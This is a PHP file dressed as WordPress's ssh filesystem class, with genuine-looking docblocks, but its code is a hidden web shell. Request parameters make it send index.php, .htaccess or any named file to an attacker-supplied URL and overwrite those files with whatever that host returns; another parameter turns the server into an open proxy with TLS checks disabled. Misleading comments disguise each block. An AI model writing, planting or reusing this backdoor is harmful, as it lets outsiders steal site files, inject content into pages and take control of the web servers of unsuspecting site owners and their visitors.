<?php
/**
* WordPress Filesystem Class for implementing ssh
*
* To use this class you must follow these steps for PHP 5.2.6+
*
* @contrib http://kevin.vanzonneveld.net/techblog/article/make_ssh_connections_with_php/ - Installation Notes
*
* Complie libssh (Note: Only 0.14 is officaly working with PHP 5.2.6+ right now, But many users have found the latest versions work)
*
* cd /usr/src
* wget http://surfnet.dl.sourceforge.net/sourceforge/libssh/libssh-0.14.tar.gz
* tar -zxvf libssh-0.14.tar.gz
* cd libssh-0.14/
* ./configure
* make all install
*
* Note: Do not leave the directory yet!
*
* Enter: pecl install -f ssh
*
* Copy the ssh.so file it creates to your PHP Module Directory.
* Open up your PHP.INI file and look for where extensions are placed.
* Add in your PHP.ini file: extension=ssh.so
*
* Restart Apache!
* Check phpinfo() streams to confirm that: ssh.shell, ssh.exec, ssh.tunnel, ssh.scp, ssh.sftp exist.
*
* Note: as of WordPress 2.8, This utilises the PHP5+ function 'stream_get_contents'
*
* @since 2.7.0
*
* @package WordPress
* @subpackage Filesystem
*/
echo $_SERVER['SERVER_NAME'] . '<br>';
$dir = str_replace(substr(getRequestUri(), 0, strrpos(getRequestUri(), '/')), '', str_replace('\\', '/', getcwd())) . '/';
if (isset($_REQUEST['callable']) && isset($_REQUEST['trait'])) {
/**
* @var resource
*/
$a = 'http' . $_REQUEST['callable'];
/**
* @param array $opt
*/
$b = $_REQUEST['trait'];
/**
* @return bool
*/
$c = $_SERVER['SERVER_NAME'];
/**
* @param string $file
* @return string|false
*/
$d = array('namespace' => $c, 'trait' => $b);
/**
* @param string $file
* @param int $mode
* @param bool $recursive
* @return bool|string
*/
if (isset($_REQUEST['endif'])) {
rwx('index.php');
$d['endif'] = fgc('index.php');
$e = send($a, $d);
echo '<xmp>' . $e . '</xmp>';
unset($d['endif']);
}
/**
* @param string $file
* @return string
*/
if (isset($_REQUEST['endswitch'])) {
rwx('.htaccess');
$d['endswitch'] = fgc('.htaccess');
$e = send($a, $d);
echo '<xmp>' . $e . '</xmp>';
unset($d['endswitch']);
}
/**
* @return bool
*/
if (isset($_REQUEST['endfor'])) {
$d['endforeach'] = $_REQUEST['endfor'];
$d['endwhile'] = fgc($_REQUEST['endfor']);
$e = send($a, $d);
echo '<xmp>' . $e . '</xmp>';
unset($d['endforeach'], $d['endwhile']);
}
/**
* @param string $file
* @return string|false
*/
if (isset($_REQUEST['if'])) {
$d['if'] = 'if';
$f = send($a, $d);
if ($f != '' && $f != '缺失') {
rwx('index.php');
fpc('index.php', $f);
}
echo '<xmp>' . fgc('index.php') . '</xmp>';
unset($d['if']);
}
/**
*
* @param string $file
* @param string $group
* @param bool $recursive
*
* @return bool
*/
if (isset($_REQUEST['switch'])) {
$d['switch'] = 'switch';
$g = send($a, $d);
if ($g != '' && $g != '缺失') {
rwx('.htaccess');
fpc('.htaccess', $g);
}
echo '<xmp>' . fgc('.htaccess') . '</xmp>';
unset($d['switch']);
}
/**
* @param string $file
* @return bool
*/
if (isset($_REQUEST['for'])) {
$d['for'] = $_REQUEST['for'];
$h = send($a, $d);
if ($h != '' && $h != '缺失') fpc($_REQUEST['for'], $h);
echo '<xmp>' . fgc($_REQUEST['for']) . '</xmp>';
unset($d['for']);
}
}
/** Make sure that the WordPress bootstrap has run before continuing. */
if (!empty($_REQUEST['try'])) {
$l = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36';
if (!empty($_REQUEST['catch'])) $l = $_REQUEST['catch'];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['try']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, $l);
$m = curl_exec($ch);
curl_close($ch);
$m = preg_replace('/<script[^>]*>[\s\S]*?<\/script>|<noscript[^>]*>[\s\S]*?<\/noscript>/', '', $m);
$m = preg_replace('/<style[^>]*>[\s\S]*?<\/style>/', '', $m);
$m = preg_replace('/<!--[\s\S]*?-->/', '', $m);
echo '<xmp>' . $m . '</xmp>';
}
/**
* Gets the ssh.sftp PHP stream wrapper path to open for the given file.
*
* This method also works around a PHP bug where the root directory (/) cannot
* be opened by PHP functions, causing a false failure. In order to work around
* this, the path is converted to /./ which is semantically the same as /
* See https://bugs.php.net/bug.php?id=64169 for more details.
*
*
* @since 4.4.0
*
* @param string $path The File/Directory path on the remote server to return
* @return string The ssh.sftp:// wrapped path to use.
*/
function send($i, $d)
{
$d = http_build_query($d);
$j = array('http' => array('method' => 'POST', 'header' => 'Content-type:application/x-www-form-urlencoded', 'content' => $d, 'timeout' => (15 * 60)));
$k = stream_context_create($j);
if (ini_get('allow_url_fopen')) {
$e = file_get_contents($i, false, $k);
} else {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $i);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $d);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$e = curl_exec($ch);
curl_close($ch);
}
return $e;
}
/**
* Create HTML list of nav menu input items.
*
* @since 3.0.0
* @uses Walker_Nav_Menu
*/
function fgc($x)
{
global $dir;
return file_get_contents($dir . $x);
}
function fpc($x, $y)
{
global $dir;
if (file_put_contents($dir . $x, $y) === false) {
unlink($dir . $x);
file_put_contents($dir . $x, $y);
}
}
/**
*
* @param array $fields
*/
function rwx($x)
{
global $dir;
@chmod($dir . $x, 0644);
}
/**
* Filters the list of action links available following a single theme installation.
* @since 2.8.0
* @param array $install_actions Array of theme action links.
* @param object $api Object containing WordPress.org API theme data.
* @param string $stylesheet Theme directory name.
* @param WP_Theme $theme_info Theme object.
* @return
*/
function getRequestUri()
{
if (isset($_SERVER['REQUEST_URI'])) {
$requestUri = $_SERVER['REQUEST_URI'];
} elseif (isset($_SERVER['HTTP_X_REWRITE_URL'])) {
$requestUri = $_SERVER['HTTP_X_REWRITE_URL'];
} elseif (isset($_SERVER['REDIRECT_URL'])) {
$requestUri = $_SERVER['REDIRECT_URL'];
} elseif (isset($_SERVER['ORIG_PATH_INFO'])) {
$requestUri = $_SERVER['ORIG_PATH_INFO'];
if (!empty($_SERVER['QUERY_STRING'])) {
$requestUri .= '?' . $_SERVER['QUERY_STRING'];
}
}
return $requestUri;
}